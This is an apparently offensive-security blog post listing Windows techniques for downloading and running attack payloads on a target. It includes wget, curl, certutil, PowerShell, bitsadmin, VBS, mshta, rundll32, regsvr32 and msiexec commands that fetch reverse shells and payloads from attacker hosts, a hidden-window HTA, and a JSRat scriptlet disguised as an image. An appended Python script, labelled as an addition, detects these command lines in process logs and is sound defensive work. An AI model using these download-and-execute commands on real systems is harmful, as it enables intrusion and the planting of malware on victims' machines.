Windows File Upload Techniques


Windows writable directories

C:\windows\system32\inetsrv\
C:\Windows\Temp\
C:\Users\Public\
C:\windows\system32\spool\PRINTERS\
C:\WINDOWS\IIS Temporary Compressed Files\
C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files
C:\Documents and Settings\NetworkService\Local Settings\Temp
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files

wget

wget http://evil.com/reverse.exe -O c:/windows/temp/reverse.exe

curl

curl http://evil.com/reverse.exe -o c:/windows/temp/reverse.exe

certutil

certutil -urlcache -split -f http://evil.com/reverse.exe c:/windows/temp/reverse.exe

PowerShell

powershell Invoke-WebRequest -Outfile c:/windows/temp/reverse.exe -Uri http://evil.com/reverse.exe

powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','E:\\phpstudy_pro\\WWW\\a.ps1')
powershell -nop -c " Invoke-WebRequest 'https://oss.xdym11235.com/13456.exe' -OutFile 'shell.exe'"

bitsadmin

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"

VBS

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >>download.vbs

download.vbs

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
' Synchronous GET of the remote file
Post.Open "GET","http://192.168.203.140/a.ps1",0
Post.Send()
' ADODB.Stream in read/write mode (3) and binary type (1) to write the response bytes
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
' 2 = adSaveCreateOverWrite: overwrite the file if it already exists
aGet.SaveToFile "D:/a.ps1",2

Debug

# Use exe2hex, or exe2bat.exe from /usr/share/windows-binaries, to convert the exe into a hex string
exe2hex -x nc.exe -b nc.bat
# or: exe2bat.exe nc.exe nc.txt
# exe2hex -x nc.exe -p nc.ps1
Then run nc.bat or nc.ps1 on the target to rebuild the executable.

mshta

mshta.exe is a Microsoft Windows program, Microsoft HTML Application host, used to run .HTA files. We can build an .hta file locally and then use mshta on the target host to download and execute it remotely. For example, create the following .hta file locally:


<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
' Shrink the window and move it off-screen so nothing is shown
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
</HEAD>
<body>
demo
</body>
</HTML>

Then run one of the following commands on the remote target host to download and execute it, with no file written to disk:

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta

rundll32

Rundll32.exe invokes a dynamic-link library from the command line; the system also has a Rundll64.exe, which runs 64-bit DLLs. Its command-line usage is Rundll32.exe DLLname,Functionname Arguments, where DLLname is the DLL to run, Functionname is the exported function of that DLL to call, and Arguments are the arguments passed to that exported function.

Here we use JSRat for the demonstration. JSRat is a command-and-control framework that generates malicious payloads only for rundll32.exe and regsvr32.exe. First run JSRat locally, listening on local port 1234:

Then visit the client command page to connect to the client and execute commands:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe  javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

regasm in .NET

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

js.png

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
    </script>
</registration>
</scriptlet>

msiexec

msiexec is a built-in Windows command-line tool that supports remote download, so an attacker can host an .msi file on a server and have the target execute it. The following example shows this: first build a malicious .msi with msfvenom (here it just pops the calculator; adjust as needed in practice) and start a simple HTTP server.

msiexec /q /i http://192.168.174.131:1234/evil.msi
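As an added example (not part of the original post), the following Python script shows the other side of every technique listed above, from certutil through regsvr32, rundll32, mshta, regasm and msiexec: how a defender can recognise these download-and-execute command lines in process-creation logs (the CommandLine field of Sysmon event 1 or Security event 4688). It generalises beyond the post's exact commands by keying on the binary plus the switch or keyword that makes it fetch from a remote http(s) URL or UNC path, and it extracts that remote source for blocking or hunting. The sample command lines are constructed; 198.51.100.7 is a documentation address, not an indicator from the post. The rule names and function names are my own.

```python
"""Detect LOLBin download/execute command lines (added example, not from the post)."""
import re
from typing import Dict, List, Optional

# Constructed sample process-creation command lines. 198.51.100.7 is a
# documentation-range placeholder, not an indicator from the post or any real host.
SAMPLE_COMMAND_LINES = [
    r'certutil -urlcache -split -f http://198.51.100.7/reverse.exe c:\windows\temp\reverse.exe',
    r'bitsadmin /transfer myDownLoadJob /download /priority normal "http://198.51.100.7/b.ps1" "C:\Users\Public\b.ps1"',
    r'powershell -nop -c "Invoke-WebRequest http://198.51.100.7/x.exe -OutFile shell.exe"',
    r"powershell (new-object Net.WebClient).DownloadFile('http://198.51.100.7/a.ps1','C:\Windows\Temp\a.ps1')",
    r'mshta http://198.51.100.7/payload.hta',
    r'mshta vbscript:Close(Execute("GetObject(""script:http://198.51.100.7/payload.sct"")"))',
    r'regsvr32 /u /n /s /i:http://198.51.100.7/payload.sct scrobj.dll',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://198.51.100.7/payload.sct");window.close();',
    r'msiexec /q /i http://198.51.100.7/evil.msi',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\198.51.100.7\share\payload.dll',
    # Benign lines: the same binaries used normally must not fire.
    r'certutil -hashfile C:\Windows\Temp\installer.msi SHA256',
    r'msiexec /i C:\Users\Public\Downloads\app.msi /qn',
    r'regsvr32 /s "C:\Program Files\Vendor\component.dll"',
    r'powershell -File C:\Scripts\backup.ps1',
]

# A remote source is an http(s) URL or a UNC path (two leading backslashes).
REMOTE = r'(https?://|\\\\)'

# Each rule pairs a binary with the switch or keyword that makes it pull from a remote
# source. Matching only the binary name would flag ordinary administrative use.
RULES = [
    ("certutil_urlcache_download", re.compile(r'\bcertutil(\.exe)?\b.*-urlcache\b.*' + REMOTE, re.I)),
    ("bitsadmin_transfer", re.compile(r'\bbitsadmin(\.exe)?\b.*/transfer\b.*' + REMOTE, re.I)),
    ("powershell_web_download", re.compile(
        r'\bpowershell(\.exe)?\b.*(Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b|\bwget\b|\bcurl\b)', re.I)),
    ("mshta_remote", re.compile(r'\bmshta(\.exe)?\b.*(https?://|\\\\|vbscript:|javascript:)', re.I)),
    ("regsvr32_scrobj", re.compile(r'\bregsvr32(\.exe)?\b.*/i:\S*' + REMOTE + r'.*scrobj\.dll', re.I)),
    ("rundll32_script", re.compile(r'\brundll32(\.exe)?\b.*(javascript:|\\\\)', re.I)),
    ("msiexec_remote_install", re.compile(r'\bmsiexec(\.exe)?\b.*/i\s+' + REMOTE, re.I)),
    ("regasm_remote_dll", re.compile(r'\bregasm(\.exe)?\b.*/u\s+' + REMOTE, re.I)),
]

# Pulls out the URL or UNC path so it can be blocked or searched for elsewhere.
SOURCE_RE = re.compile(r'''(https?://[^\s"')]+|\\\\[^\s"')]+)''', re.I)


def classify(command_line: str) -> List[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, pattern in RULES if pattern.search(command_line)]


def scan(lines) -> Dict[str, List[str]]:
    """Map each matched rule name to the command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        for name in classify(line):
            hits.setdefault(name, []).append(line)
    return hits


def remote_source(command_line: str) -> Optional[str]:
    """Return the remote URL or UNC path a command line fetches from, or None."""
    match = SOURCE_RE.search(command_line)
    return match.group(1) if match else None


if __name__ == "__main__":
    for rule, lines in scan(SAMPLE_COMMAND_LINES).items():
        for line in lines:
            print(f"[{rule}] source={remote_source(line)}")
            print(f"    {line}")
```

Feed it real CommandLine values exported from the SIEM instead of the constructed list; the benign entries at the end of the sample show why each rule keys on the remote-fetch switch rather than the binary alone, since certutil, msiexec and regsvr32 all have routine local uses.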

certutil in detail

https://mp.weixin.qq.com/s/T7k_hA4fvlWhy7VmzoqG6Q

References

https://www.cnblogs.com/0daybug/p/13246727.html

https://blog.csdn.net/qq_23936389/article/details/105548763

Notice: Hack All Sec's blog | All rights reserved, violators will be prosecuted | Unless otherwise noted, all posts are original | This site is licensed under the BY-NC-SA license

Reposting: please cite the original link - Windows File Upload Techniques
